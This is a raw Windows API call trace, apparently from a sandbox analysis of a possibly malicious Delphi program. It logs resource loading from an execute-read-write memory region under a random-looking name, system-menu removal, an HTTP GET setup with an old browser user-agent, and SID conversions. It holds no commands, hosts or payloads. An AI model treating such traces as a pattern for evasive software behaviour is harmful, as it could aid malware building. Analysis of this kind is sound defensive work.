[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a2dd90*="WINSTA_EXITWINDOWS") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a2dd80*="WINSTA_ENUMERATE") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a2dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a2dd60*="WINSTA_CREATEDESKTOP") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a2dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a2dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2dd10*="STANDARD_RIGHTS_READ") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a2dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dcf0*="READ_CONTROL") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a2dce0*="SI_ACCESS_SPECIFIC") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dcd0*="WRITE_DAC") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a2dcc0*="FILE_DELETE") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a2dcb0*="FILE_DELETE_CHILD") returned 1
[0120.223] SetClassLongA (hWnd=0x401dc, nIndex=-14, dwNewLong=65575) returned 0x0
[0120.224] GetSystemMenu (hWnd=0x401dc, bRevert=0) returned 0x40225
[0120.224] DeleteMenu (hMenu=0x40225, uPosition=0xf030, uFlags=0x0) returned 1
[0120.224] DeleteMenu (hMenu=0x40225, uPosition=0xf000, uFlags=0x0) returned 1
[0120.224] DeleteMenu (hMenu=0x40225, uPosition=0xf010, uFlags=0x0) returned 1
[0120.224] GetCurrentThreadId () returned 0xfcc
[0120.224] ResetEvent (hEvent=0xa0) returned 1
[0120.224] GetCurrentThreadId () returned 0xfcc
[0120.224] GetCurrentThreadId () returned 0xfcc
[0120.224] GetCurrentThreadId () returned 0xfcc
[0120.224] ResetEvent (hEvent=0xa0) returned 1
[0120.224] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af16c, fWinIni=0x0 | out: pvParam=0x1af16c) returned 1
[0120.224] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af16c, fWinIni=0x0 | out: pvParam=0x1af16c) returned 1
[0120.224] GetSystemMetrics (nIndex=49) returned 16
[0120.225] GetSystemMetrics (nIndex=50) returned 16
[0120.225] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af1b4, fWinIni=0x0 | out: pvParam=0x1af1b4) returned 1
[0120.225] IsWindowVisible (hWnd=0x401dc) returned 0
[0120.225] GetCurrentThreadId () returned 0xfcc
[0120.225] VirtualQuery (in: lpAddress=0x2a01668, lpBuffer=0x1af084, dwLength=0x1c | out: lpBuffer=0x1af084*(BaseAddress=0x2a01000, AllocationBase=0x2940000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0120.225] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0120.225] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0120.225] LoadResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0x2a4f044
[0120.225] SizeofResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0xca5
[0120.225] LockResource (hResData=0x2a4f044) returned 0x2a4f044
[0120.225] GetCurrentThreadId () returned 0xfcc
[0120.225] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1aee38, fWinIni=0x0 | out: pvParam=0x1aee38) returned 1
[0120.226] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1aee38, fWinIni=0x0 | out: pvParam=0x1aee38) returned 1
[0120.226] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1aee38, fWinIni=0x0 | out: pvParam=0x1aee38) returned 1
[0120.226] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1aee38, fWinIni=0x0 | out: pvParam=0x1aee38) returned 1
[0120.227] GetDC (hWnd=0x0) returned 0x16010853
[0120.227] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.227] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0120.228] CreateFontIndirectA (lplf=0x1aedd4) returned 0x4d0a0875
[0120.228] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.228] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.229] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.229] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.229] GetSystemMetrics (nIndex=6) returned 1
[0120.229] VirtualAlloc (lpAddress=0x2a64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a64000
[0120.229] GetDC (hWnd=0x0) returned 0x16010853
[0120.229] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.229] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.229] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.229] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.229] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.229] GetSystemMetrics (nIndex=6) returned 1
[0120.230] GetDC (hWnd=0x0) returned 0x16010853
[0120.230] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.230] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.230] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.230] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.230] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.230] GetSystemMetrics (nIndex=6) returned 1
[0120.230] GetDC (hWnd=0x0) returned 0x16010853
[0120.230] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.230] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.230] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.230] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.230] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.230] GetSystemMetrics (nIndex=6) returned 1
[0120.231] GetDC (hWnd=0x0) returned 0x16010853
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.231] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.231] GetSystemMetrics (nIndex=6) returned 1
[0120.231] GetDC (hWnd=0x0) returned 0x16010853
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.231] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.231] GetSystemMetrics (nIndex=6) returned 1
[0120.231] GetDC (hWnd=0x0) returned 0x16010853
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.231] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.231] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.231] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.231] GetSystemMetrics (nIndex=6) returned 1
[0120.232] GetDC (hWnd=0x0) returned 0x16010853
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.232] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.232] GetSystemMetrics (nIndex=6) returned 1
[0120.232] GetDC (hWnd=0x0) returned 0x16010853
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.232] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.232] GetSystemMetrics (nIndex=6) returned 1
[0120.232] GetDC (hWnd=0x0) returned 0x16010853
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.232] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.232] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.232] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.233] GetSystemMetrics (nIndex=6) returned 1
[0120.233] GetDC (hWnd=0x0) returned 0x16010853
[0120.233] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.233] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.233] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.233] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.233] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.233] GetSystemMetrics (nIndex=6) returned 1
[0120.233] GetDC (hWnd=0x0) returned 0x16010853
[0120.233] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.233] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.233] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.233] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.233] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.233] GetSystemMetrics (nIndex=6) returned 1
[0120.234] GetDC (hWnd=0x0) returned 0x16010853
[0120.234] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.234] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.234] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.234] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.234] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.234] GetSystemMetrics (nIndex=6) returned 1
[0120.234] GetDC (hWnd=0x0) returned 0x16010853
[0120.234] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.234] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.234] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.234] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.234] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.234] GetSystemMetrics (nIndex=6) returned 1
[0120.234] GetDC (hWnd=0x0) returned 0x16010853
[0120.234] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.234] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.235] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.235] GetSystemMetrics (nIndex=6) returned 1
[0120.235] GetDC (hWnd=0x0) returned 0x16010853
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.235] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.235] GetSystemMetrics (nIndex=6) returned 1
[0120.235] GetDC (hWnd=0x0) returned 0x16010853
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.235] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.235] GetSystemMetrics (nIndex=6) returned 1
[0120.235] GetDC (hWnd=0x0) returned 0x16010853
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.235] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.235] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.235] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.236] GetSystemMetrics (nIndex=6) returned 1
[0120.236] GetDC (hWnd=0x0) returned 0x16010853
[0120.236] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee30 | out: lptm=0x1aee30) returned 1
[0120.236] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.236] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee68 | out: lptm=0x1aee68) returned 1
[0120.236] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.236] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.236] GetSystemMetrics (nIndex=6) returned 1
[0120.236] GetDC (hWnd=0x0) returned 0x16010853
[0120.236] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb34 | out: lptm=0x1aeb34) returned 1
[0120.236] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.236] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aeb6c | out: lptm=0x1aeb6c) returned 1
[0120.236] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.236] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.236] GetSystemMetrics (nIndex=6) returned 1
[0120.236] GetDC (hWnd=0x0) returned 0x16010853
[0120.236] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee1c | out: lptm=0x1aee1c) returned 1
[0120.236] SelectObject (hdc=0x16010853, h=0x4d0a0875) returned 0x18a002e
[0120.237] GetTextMetricsA (in: hdc=0x16010853, lptm=0x1aee54 | out: lptm=0x1aee54) returned 1
[0120.237] SelectObject (hdc=0x16010853, h=0x18a002e) returned 0x4d0a0875
[0120.237] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0120.237] GetSystemMetrics (nIndex=6) returned 1
[0120.238] SysReAllocStringLen (in: pbstr=0x2a6f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0120.239] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.239] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.239] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.239] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0120.239] SysReAllocStringLen (in: pbstr=0x2a6f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a6f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0120.239] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x1aeeb8, lpdwBufferLength=0x1aeebc | out: lpBuffer=0x1aeeb8, lpdwBufferLength=0x1aeebc) returned 1
[0120.324] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x1aeeb8, dwBufferLength=0x4) returned 1
[0120.324] VirtualFree (lpAddress=0x2a70000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0120.324] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a66490, cbMultiByte=3, lpWideCharStr=0x1addf0, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.325] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0120.326] FlatSB_SetScrollProp (param_1=0x401e6, index=0x200, newValue=0x0, param_4=1) returned 0
[0120.326] GetSysColor (nIndex=20) returned 0xffffff
[0120.326] FlatSB_SetScrollProp (param_1=0x401e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0120.326] FlatSB_SetScrollInfo (param_1=0x401e6, code=0, psi=0x1add26, fRedraw=1)
[0120.327] CallWindowProcA (lpPrevWndFunc=0x2947038, hWnd=0x401e6, Msg=0x46, wParam=0x0, lParam=0x1adc24) returned 0x0
[0120.331] GetTextExtentPoint32A (in: hdc=0x16010853, lpString="0", c=1, psizl=0x1aefac | out: psizl=0x1aefac) returned 1
[0120.331] IsIconic (hWnd=0x401e6) returned 0
[0120.331] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aefac | out: lpRect=0x1aefac) returned 1
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] IsIconic (hWnd=0x401e6) returned 0
[0120.331] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeef4 | out: lpRect=0x1aeef4) returned 1
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] IsIconic (hWnd=0x401e6) returned 0
[0120.331] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.331] IsIconic (hWnd=0x401e6) returned 0
[0120.331] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.331] FlatSB_SetScrollProp (param_1=0x401e6, index=0x200, newValue=0x0, param_4=0) returned 0
[0120.331] GetSysColor (nIndex=20) returned 0xffffff
[0120.331] FlatSB_SetScrollProp (param_1=0x401e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0120.331] FlatSB_SetScrollInfo (param_1=0x401e6, code=0, psi=0x1aef02, fRedraw=1) returned 0
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.332] FlatSB_SetScrollProp (param_1=0x401e6, index=0x100, newValue=0x0, param_4=0) returned 0
[0120.332] GetSysColor (nIndex=20) returned 0xffffff
[0120.332] FlatSB_SetScrollProp (param_1=0x401e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0120.332] FlatSB_SetScrollInfo (param_1=0x401e6, code=1, psi=0x1aef02, fRedraw=1) returned 0
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeef4 | out: lpRect=0x1aeef4) returned 1
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.332] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.332] IsIconic (hWnd=0x401e6) returned 0
[0120.333] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.333] FlatSB_SetScrollProp (param_1=0x401e6, index=0x200, newValue=0x0, param_4=0) returned 0
[0120.333] GetSysColor (nIndex=20) returned 0xffffff
[0120.333] FlatSB_SetScrollProp (param_1=0x401e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0120.333] FlatSB_SetScrollInfo (param_1=0x401e6, code=0, psi=0x1aef02, fRedraw=1) returned 0
[0120.333] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.333] IsIconic (hWnd=0x401e6) returned 0
[0120.333] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.333] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.333] IsIconic (hWnd=0x401e6) returned 0
[0120.333] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.333] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.333] IsIconic (hWnd=0x401e6) returned 0
[0120.333] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.333] FlatSB_SetScrollProp (param_1=0x401e6, index=0x100, newValue=0x0, param_4=0) returned 0
[0120.333] GetSysColor (nIndex=20) returned 0xffffff
[0120.333] FlatSB_SetScrollProp (param_1=0x401e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0120.333] FlatSB_SetScrollInfo (param_1=0x401e6, code=1, psi=0x1aef02, fRedraw=1) returned 0
[0120.333] GetWindowLongA (hWnd=0x401e6, nIndex=-16) returned 116326400
[0120.333] IsIconic (hWnd=0x401e6) returned 0
[0120.333] GetClientRect (in: hWnd=0x401e6, lpRect=0x1aeec4 | out: lpRect=0x1aeec4) returned 1
[0120.333] GetCurrentThreadId () returned 0xfcc
[0120.334] ConvertSidToStringSidA () returned 0x1
[0120.334] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.334] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0120.334] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.334] LocalFree (hMem=0x2b2f90) returned 0x0
[0120.334] ConvertStringSidToSidA () returned 0x1
[0120.334] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a62914, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] IsValidSid (pSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] ConvertSidToStringSidA () returned 0x1
[0120.334] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.334] LocalFree (hMem=0x2b2f90) returned 0x0
[0120.334] ConvertStringSidToSidA () returned 0x1
